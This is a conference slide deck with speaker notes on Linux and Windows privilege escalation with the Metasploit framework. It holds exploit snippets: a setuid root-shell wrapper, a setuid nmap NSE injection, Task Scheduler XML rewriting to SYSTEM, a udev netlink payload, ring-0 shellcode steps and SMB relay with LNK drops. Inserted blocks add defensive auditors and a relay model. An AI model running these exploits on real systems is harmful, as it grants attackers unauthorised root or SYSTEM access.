PRIVILEGE ESCALATION WITH THE
METASPLOIT FRAMEWORK
For when you absolutely, positively, have to have root (and don't mind the occasional kernel panic).
egypt
WHY METASPLOIT?
LARGE OPEN SOURCE COMMUNITY
WHY PRIVILEGE ESCALATION?
HIGH IS BETTER THAN LOW
Persistence
• Backdoor login facilities, add users
Stealth
• Modify logs to conceal presence
• More options for hiding files/processes
Various nefarious activity
• Inject into other users' processes
• Capture packets
CONTRIVED EXAMPLE
#include <unistd.h>

/* Deliberately minimal setuid-root wrapper: installed with the setuid bit,
   it hands a root shell to anyone allowed to execute it. */
int
main(int argc, char* argv[]){
    setuid(0); setgid(0);
    execv("/bin/sh", argv);
    return 0;
}
MSF::EXPLOIT::LOCAL
• Inherit from Exploit
– Provides payloads and handlers
• Include Exploit mixins
– Most useful right now is Exploit::EXE
• Include Post mixins
– Provides session interaction
– Write files, manipulate registry, etc
CONTRIVED EXPLOIT (1/2)
include Msf::Exploit::EXE
include Msf::Post::Common
include Msf::Post::File
...
'Platform' => 'linux',
'Arch' => ARCH_X86,
...
CONTRIVED EXPLOIT (2/2)
def exploit
  elf = generate_payload_exe        # ELF payload built by Exploit::EXE
  write_file("./foo", elf)          # Post::File: write it through the session
  cmd_exec("chmod +x ./foo")
  cmd_exec("/tmp/sh -c ./foo &")    # run it via the setuid shell from the contrived example
end
REAL-WORLD* EXAMPLE -- NMAP
• Nmap is a security tool
• It needs root for some things
• Sometimes admins chmod +s it for convenience
* This is not a default configuration and the Nmap man page tells you it's stupid
NMAP SCRIPTING ENGINE
• Scan stuff with Lua
• Very powerful
• Fast and easy to write (compared to C++ for hacking on Nmap itself)
NSE-FLAVORED LUA
• Has a specific structure
• API expects you to have an action function and several fields
– Complains if they aren't there
SETUID NMAP EXPLOIT
def exploit
  cmd = payload.encoded
  write_file("./f.nse",
    %Q^os.execute("#{cmd}")^
  )
  ...
  cmd_exec(
    "nmap -p1 ::1 --script ./f.nse"
  )
end
DEMO: MULTI/LOCAL/SETUID_NMAP
"Nmap should never be installed with special privileges (e.g. suid root) for security reasons."
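A check for the misconfiguration the Nmap slides describe, added here as an example and not part of the deck or of Metasploit: it walks the given directories, reports every setuid/setgid file, and marks by name the ones that execute caller-supplied scripts (Nmap via NSE, per the slides). The SCRIPTABLE list and the directory list are assumptions to extend for your own estate.

```ruby
require 'tmpdir'

# Binaries that run code the invoking user supplies. With the setuid bit set
# they are a root shell for anyone who can execute them; nmap is here because
# of the NSE case in the slides. Illustrative list, extend it for your systems.
SCRIPTABLE = %w[nmap].freeze

# Regular files under the given directories with the setuid or setgid bit set.
# lstat is used so symlinks are skipped rather than followed.
def setid_files(dirs)
  dirs.flat_map do |dir|
    Dir.glob(File.join(dir, '**', '*')).select do |path|
      st = File.lstat(path)
      st.file? && (st.setuid? || st.setgid?)
    end
  end
end

# One record per finding, with a coarse risk tag for triage.
def audit_setid(dirs)
  setid_files(dirs).map do |path|
    st = File.lstat(path)
    risk = if SCRIPTABLE.include?(File.basename(path))
             :root_shell_via_scripting   # the Nmap + NSE case
           elsif st.setuid? && st.uid.zero?
             :setuid_root                # expected for passwd/sudo, review the rest
           else
             :setid_other                # setgid, or setuid to a non-root owner
           end
    { path: path, mode: format('%04o', st.mode & 0o7777), owner_uid: st.uid, risk: risk }
  end
end

# Stand-alone run against the usual system binary directories.
if $PROGRAM_NAME == __FILE__
  audit_setid(%w[/usr/bin /usr/sbin /bin /sbin /usr/local/bin]).each do |f|
    puts format('%-26s %s uid=%d %s', f[:risk], f[:mode], f[:owner_uid], f[:path])
  end
end
```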
MS10_092_SCHELEVATOR
• Stuxnet 0day
• Schtasks stores tasks as XML files
– Readable/Writable by user that created task
• Uses CRC32 to verify integrity
CREATE A TASK…
cmdline = "schtasks.exe /create /tn #{taskname} /tr \"#{cmd}\" /sc monthly /f"
...
MODIFY IT TO RUN AS SYSTEM…
content.gsub!(
  'LeastPrivilege',
  'HighestAvailable'
)
content.gsub!(
  /<UserId>.*<\/UserId>/,
  '<UserId>S-1-5-18</UserId>'
)
FIND A CRC COLLISION
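A detection pass over Task Scheduler XML for the two rewrites the schelevator slides show, added here as an example and not the deck's or Metasploit's code. The sample task file is constructed; the audit rules (a principal running as S-1-5-18 or at HighestAvailable on a task whose Author is an ordinary account, and a command under a user-writable path) are heuristics of this example, not a Microsoft-defined check.

```ruby
require 'rexml/document'
require 'rexml/xpath'

TASK_NS      = 'http://schemas.microsoft.com/windows/2004/02/mit/task'
LOCAL_SYSTEM = 'S-1-5-18'

# Constructed sample: a task as a low-privileged user could legitimately register it.
BENIGN_TASK = <<~XML
  <Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
    <RegistrationInfo><Author>WORKSTATION\\lowpriv</Author></RegistrationInfo>
    <Principals>
      <Principal id="Author">
        <UserId>WORKSTATION\\lowpriv</UserId>
        <RunLevel>LeastPrivilege</RunLevel>
      </Principal>
    </Principals>
    <Actions Context="Author">
      <Exec><Command>C:\\Users\\lowpriv\\backup.cmd</Command></Exec>
    </Actions>
  </Task>
XML

# The same file after the two gsub! rewrites from the slides (used only to build test input).
def tamper_like_schelevator(xml)
  xml.gsub('LeastPrivilege', 'HighestAvailable')
     .gsub(%r{<UserId>.*</UserId>}, "<UserId>#{LOCAL_SYSTEM}</UserId>")
end

# Returns a list of human-readable findings; empty means nothing suspicious.
def audit_task_xml(xml)
  doc = REXML::Document.new(xml)
  ns  = { 't' => TASK_NS }
  author = REXML::XPath.first(doc, '/t:Task/t:RegistrationInfo/t:Author', ns)&.text
  findings = []

  REXML::XPath.each(doc, '/t:Task/t:Principals/t:Principal', ns) do |principal|
    user  = REXML::XPath.first(principal, 't:UserId', ns)&.text
    level = REXML::XPath.first(principal, 't:RunLevel', ns)&.text
    # Heuristic: an ordinary Author should not end up with a LocalSystem principal.
    if user == LOCAL_SYSTEM && author && author != user
      findings << "principal runs as LocalSystem (#{LOCAL_SYSTEM}) but task was registered by #{author}"
    end
    # Heuristic: HighestAvailable on a task registered by a non-SYSTEM account.
    if level == 'HighestAvailable' && author && !author.end_with?('SYSTEM')
      findings << "RunLevel HighestAvailable on a task registered by #{author}"
    end
  end

  # Only worth flagging once the principal itself looks escalated.
  REXML::XPath.each(doc, '//t:Exec/t:Command', ns) do |cmd|
    path = cmd.text.to_s
    if findings.any? && path =~ /\A[A-Za-z]:\\Users\\/i
      findings << "escalated task runs a command from a user-writable path: #{path}"
    end
  end
  findings
end

if $PROGRAM_NAME == __FILE__
  puts 'benign:   ' + audit_task_xml(BENIGN_TASK).inspect
  puts 'tampered: ' + audit_task_xml(tamper_like_schelevator(BENIGN_TASK)).inspect
end
```

Pointed at C:\Windows\System32\Tasks\*.xml the same function gives a first-pass triage list; a CRC32 match on the file says nothing, since CRC32 is not collision resistant.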
Except when…
COMPILING/ASSEMBLING WITH METASM
• Can compile C for x86/x86_64
• Assemble x86, x64, mips, arm, ppc and more
• Executables or shared objects
COMPILED C DEV PROCESS*
• Develop on a system with headers
• "Factorize" structs, #defines, etc
– There are gotchas with this
• Builds dynamic executables
[*] Subject to change without notice
LINUX/LOCAL/UDEV_NETLINK
• UDEV gets events from the kernel
• On multicast netlink sockets
– Which can only be sent by root
• Doesn't mind getting unicast
– Which can be sent by unpriv users
95-UDEV-LATE.RULES
ACTION=="remove",
ENV{REMOVE_CMD}!="",
RUN+="$env{REMOVE_CMD}"
THE EXPLOIT
remove@/d
SUBSYSTEM=block
DEVPATH=/dev/foo
TIMEOUT=10
REMOVE_CMD=/tmp/evil
cparser.parse(main, "main.c")          # parse the C source (main) with metasm's C parser
c = cpu.new_ccompiler(cparser, sc)     # C compiler for the chosen CPU, emitting into sc
sc.parse(c.compile)                    # feed the generated assembly to the shellcode object
sc.assemble
elf = sc.encode_string                 # encoded binary ready to drop
write_file("/tmp/evil", elf)
cmd_exec("chmod +x /tmp/evil")
cmd_exec("/tmp/evil &")
LINUX/LOCAL/SOCK_SENDPAGE
• NULL dereference in proto_ops
• Linux allows userspace to mmap(NULL, …)
• shellcode at NULL + bug == ring0 code exec
RING 0 SHELLCODE <2.6.29
• Find task struct
– 4k or 8k stacks?
• Change uid/gid to 0
• Change CAPS bits to all 1s
RING 0 SHELLCODE >= 2.6.29
• Find prepare_kernel_cred function
• Find commit_creds function
• Call them
DEMO: LINUX/LOCAL/SOCK_SENDPAGE
AKA Wunderbar Emporium
LEFTOVER JUNK FROM DEFCON
SMB RELAY
(Diagram: Victim, Attacker, Target)
1. Victim begins NTLM authentication against the Attacker
2. Attacker begins NTLM auth against Target
3. Target replies with 8-byte challenge
4. Attacker sends Target's challenge to Victim
5. Victim calculates challenge response and replies with final authentication packet
6. Attacker logs into Target with Victim's credentials
SMB RELAY
• Well-known attack
• Some mitigations break it, but largely still
useful and will be for a long time
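The six-step exchange above as a toy model, added here as an example rather than code from the deck or from smb_relay: both sides' messages, the attacker as a pure forwarder, and why requiring SMB signing is one of the mitigations that break the relay. The message framing is invented; the key derivation follows NTLMv2 as specified in MS-NLMP (NTOWFv2, NTProofStr, SessionBaseKey), with a constructed 16-byte stand-in for the victim's NT hash and a constructed user and domain.

```ruby
require 'openssl'
require 'securerandom'

# NTLMv2 derivations (MS-NLMP):
#   NTOWFv2        = HMAC_MD5(NT_hash, UTF16LE(upper(user) + domain))
#   NTProofStr     = HMAC_MD5(NTOWFv2, server_challenge + client_blob)
#   SessionBaseKey = HMAC_MD5(NTOWFv2, NTProofStr)
def hmac_md5(key, data)
  OpenSSL::HMAC.digest('MD5', key, data)
end

# Constructed stand-in for the NT hash (really MD4 of the UTF-16LE password).
# Known to Victim and to the authority Target checks against; never to Attacker.
VICTIM_NT_HASH = ("\xAA\x55" * 8).b
USER   = 'jdoe'   # constructed
DOMAIN = 'CORP'   # constructed

def ntowf_v2(nt_hash, user, domain)
  hmac_md5(nt_hash, (user.upcase + domain).encode('UTF-16LE').b)
end

class Victim
  def initialize(nt_hash)
    @ntowf = ntowf_v2(nt_hash, USER, DOMAIN)
  end

  # Steps 1, 4, 5: Victim answers whatever 8-byte challenge its peer presents;
  # nothing in the message tells it the challenge originated at Target.
  def authenticate(server_challenge)
    client_blob = SecureRandom.random_bytes(8)             # stands in for the NTLMv2 temp blob
    proof = hmac_md5(@ntowf, server_challenge + client_blob) # NTProofStr
    { user: USER, domain: DOMAIN, blob: client_blob, proof: proof }
  end

  # Only a holder of NTOWFv2 can derive the signing key for this session.
  def session_key(auth)
    hmac_md5(@ntowf, auth[:proof])
  end
end

class Target
  def initialize(nt_hash, require_signing:)
    @ntowf = ntowf_v2(nt_hash, USER, DOMAIN)  # in reality the DC validates on Target's behalf
    @require_signing = require_signing
  end

  def issue_challenge
    @challenge = SecureRandom.random_bytes(8)  # step 3: 8-byte server challenge
  end

  # Step 6: the relayed AUTHENTICATE is a correct answer to Target's own challenge.
  def accept_auth?(auth)
    expected = hmac_md5(@ntowf, @challenge + auth[:blob])
    return false unless expected == auth[:proof]  # use a constant-time compare in real code
    @session_key = hmac_md5(@ntowf, auth[:proof])  # SessionBaseKey
    true
  end

  # With signing required, every later request must carry an HMAC under the session key.
  def accept_request?(msg, signature)
    return true unless @require_signing
    hmac_md5(@session_key, msg) == signature
  end
end

# Attacker forwards messages and knows neither the NT hash nor NTOWFv2.
def run_relay(require_signing:)
  victim = Victim.new(VICTIM_NT_HASH)
  target = Target.new(VICTIM_NT_HASH, require_signing: require_signing)
  challenge = target.issue_challenge        # steps 2-3: Attacker obtains Target's challenge
  auth = victim.authenticate(challenge)     # steps 4-5: Attacker presents it to Victim
  return :auth_rejected unless target.accept_auth?(auth) # step 6: Victim's answer replayed to Target
  request = 'SMB2 TREE_CONNECT \\\\target\\C$'
  guessed_key = SecureRandom.random_bytes(16) # no NTOWFv2, so no way to derive the real key
  target.accept_request?(request, hmac_md5(guessed_key, request)) ? :relay_succeeded : :blocked_by_signing
end

# Control: the legitimate Victim can sign because it holds NTOWFv2.
def legitimate_session_ok?
  victim = Victim.new(VICTIM_NT_HASH)
  target = Target.new(VICTIM_NT_HASH, require_signing: true)
  auth = victim.authenticate(target.issue_challenge)
  request = 'SMB2 TREE_CONNECT \\\\target\\C$'
  target.accept_auth?(auth) &&
    target.accept_request?(request, hmac_md5(victim.session_key(auth), request))
end
```

Authentication itself succeeds in both runs; signing only denies the attacker the use of the session, which is why the relay still works wherever signing is optional.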
SMB RELAY + LNK FILE
(Diagram: compromised Attacker, File Server, Victim, Target)
1. Create and drop an LNK file on the File Server (post/windows/escalate/droplnk)
2. Set up a relay (exploit/windows/smb/smb_relay)
3. Wait for an Admin to open that directory
AUTOMATIC DOMAIN AUTH
• Windows stores creds in memory and does NTLM auth using your current token
• When you do something in the GUI that requires auth, it happens transparently using those creds
• If your user has Local Admin on another box, you can create/start services (usually)
SC_HANDLE WINAPI OpenSCManager(
__in_opt LPCTSTR lpMachineName,
__in_opt LPCTSTR lpDatabaseName,
__in DWORD dwDesiredAccess );
SC_HANDLE WINAPI CreateService(
__in SC_HANDLE hSCManager,
__in LPCTSTR lpServiceName,
__in_opt LPCTSTR lpDisplayName,
__in DWORD dwDesiredAccess,
__in DWORD dwServiceType,
__in DWORD dwStartType,
__in DWORD dwErrorControl,
__in_opt LPCTSTR lpBinaryPathName,
__in_opt LPCTSTR lpLoadOrderGroup,
__out_opt LPDWORD lpdwTagId,
__in_opt LPCTSTR lpDependencies,
__in_opt LPCTSTR lpServiceStartName,
__in_opt LPCTSTR lpPassword );
DEMO: OWNING DC USING DA TOKEN
Yay automatic authentication
FUTURE WORK
1. Compile to shellcode
2. Upload in memory
3. Fork (prevents parent session crash)
4. Child jumps to shellcode
5. Do the root dance
FUTURE WORK
• Port all the stuff in post/*/escalate/ to Exploit::Local
• Pull more code up into mixins
CONCLUSIONS
• Shells are awesome
• Root shells are better
• Metasploit is awesomesauce
• If it doesn't already do what you need, it's easy to add new modules
• Twitter: @egyp7
• IRC: #metasploit on FreeNode
QUESTIONS?
Editor's Notes

  1. I’m egypt. I like Comic Sans and I don’t care who knows it
  2. I’m not Egypt
  3. I’ve never used my beard to take over a country. But I'm working on it.
  4. I work on a really cool project that makes it easier to get shells. Metasploit was created in 2003, I started using it circa 2004, started contributing in 2007. HDM gave me commit access in April 2008, we released 3.2 under a BSD license in October 2008. Acquired by Rapid7 in Oct 2009. Currently 10 full-time employees on the Metasploit team. Literally hundreds of contributors. Metasploit is a framework, first and foremost. It's not just a bunch of exploits, it's everything you need to write exploits; it's a clearinghouse for compromised machines; it's a means of automating reconnaissance, compromise, post-compromise, and pivoting.
  5. 3 main reasons
  6. First, It's already great at getting shells. We have nearly a thousand exploits and support dozens of protocols.
  7. OSS. I mention this every chance I get because I think it’s worth repeating. You have the source code. It’s BSD-licensed. It’s pretty darned easy to write your own stuff to work with it. Ruby is an easy language to learn and even if you don’t like Ruby because you love terrorists and hate freedom, it’s easy to interface with RPC. If you write something awesome that you want the world to see, getting it in the Metasploit trunk gives you an instant userbase of over 150,000 hackers.
  8. Lastly, it's usually faster and easier to write Ruby vs C. Sometimes you have to hand-assemble a payload, sometimes you can save hours by writing it in C. Ruby can save you even more. When you have to get down and dirty, you can use metasm to write C or assembly.
  9. This should be fairly obvious: root is better than no privs, but why?
  10. In general higher privileges give you more options. More places to hide, more
  11. Can also include Auxiliary and Exploit mixins, of course.
  12. Lots of public exploits exist for this bug, discovered by Tavis Ormandy and Julien Tinnes. spender did a lot to publicize, rcvalle wrote a version for PPC. It's interesting in part because it affects a wide range of kernel versions: 2.4.4 -> 2.4.37.4 and 2.6.0 -> 2.6.30.4. That's all kernels from May 2001 through August 2009.
  13. This is a well-known attack. I'll explain it briefly to give you some background.
  14. If Victim is Local Admin on Target, you can get a SYSTEM shell via psexec.
  15. It used to be even more useful before ms08-068, which broke the ability to relay back to the victim. Coffee shops and airports were overflowing with free shells. A good time was had by most.
  16. Create an LNK file on a share you have access to (post/windows/escalate/droplnk). Set up exploit/windows/smb/smb_relay pointing at Target. Go get coffee while you wait for an Admin to look at the file share.
  17. The first point is how WCE, mimikatz, fgdump, et al can grab password hashes out of memory. That's still important, but if you don't need the hash to authenticate (since you're already authenticated), why bother uploading a tool that will get caught by AV? Much better to use built-in Windows functionality.
  18. "lpMachineName [in, optional] The name of the target computer. If the pointer is NULL or points to an empty string, the function connects to the service control manager on the local computer." If you provide a hostname/address here, it does the normal NTLM authentication song and dance and lets you transparently modify the remote service system.
  19. "lpBinaryPathName [in, optional] If you specify a path on another computer, the share must be accessible by the computer account of the local computer because this is the security context used in the remote call. However, this requirement allows any potential vulnerabilities in the remote computer to affect the local computer. Therefore, it is best to use a local file." Most places in Windows that expect a path can take a UNC path which will cause Windows to transparently authenticate to whatever host you specify.
  20. I struggled a bit with where to put this module. It requires a payload, so it's an exploit. It requires a session, so it's a post. Good candidate for Exploit::Local, but it's really a remote. And exploit/windows/local/remote/ is a bit awkward.